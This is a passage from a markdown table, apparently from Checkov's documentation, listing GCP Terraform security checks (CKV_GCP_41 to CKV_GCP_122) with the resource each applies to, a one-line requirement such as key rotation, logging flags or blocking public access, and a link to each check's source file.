[GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2453 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 2454 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 2455 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | +| 2456 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | +| 2457 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 2458 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | 
[GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 2459 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 2460 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 2461 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 2462 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 2463 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 2464 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | 
[GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 2465 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 2466 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 2467 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 2468 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 2469 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | +| 2470 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | 
[GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | +| 2471 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | +| 2472 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | +| 2473 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | +| 2474 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | +| 2475 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | +| 2476 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | 
[GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | +| 2477 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | +| 2478 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | +| 2479 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | +| 2480 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | +| 2481 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | +| 2482 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | +| 2483 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private 
Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | +| 2484 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | +| 2485 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | +| 2486 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 2487 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 2488 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 2489 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 2490 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | 
[GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | +| 2491 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | +| 2492 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 2493 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 2494 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | +| 2495 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | +| 2496 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | +| 2497 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | +| 2498 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | +| 2499 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | +| 2500 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | 
[CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | +| 2501 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | +| 2502 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | +| 2503 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | +| 2504 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | +| 2505 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | +| 2506 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 
[BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | +| 2507 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | +| 2508 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | +| 2509 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | +| 2510 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | +| 2511 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | +| 2512 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | +| 2513 | CKV_GCP_92 | resource | google_vertex_ai_dataset 
| Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | +| 2514 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | +| 2515 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | +| 2516 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | +| 2517 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | +| 2518 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | +| 2519 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | 
[DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 2520 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 2521 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 2522 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 2523 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 2524 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 2525 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 2526 | CKV_GCP_101 | resource | 
google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 2527 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 2528 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 2529 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | +| 2530 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | +| 2531 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | +| 2532 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | 
[GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) |
+| 2533 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2534 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2535 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2536 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) |
+| 2537 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) |
+| 2538 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) |
+| 2539 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) |
+| 2540 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) |
+| 2541 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 2542 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 2543 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) |
+| 2544 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) |
+| 2545 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) |
+| 2546 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) |
+| 2547 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) |
+| 2548 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) |
+| 2549 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) |
+| 2550 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) |
+| 2551 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) |
+| 2552 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) |
+| 2553 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) |
+| 2554 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) |
+| 2555 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) |
+| 2556 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) |
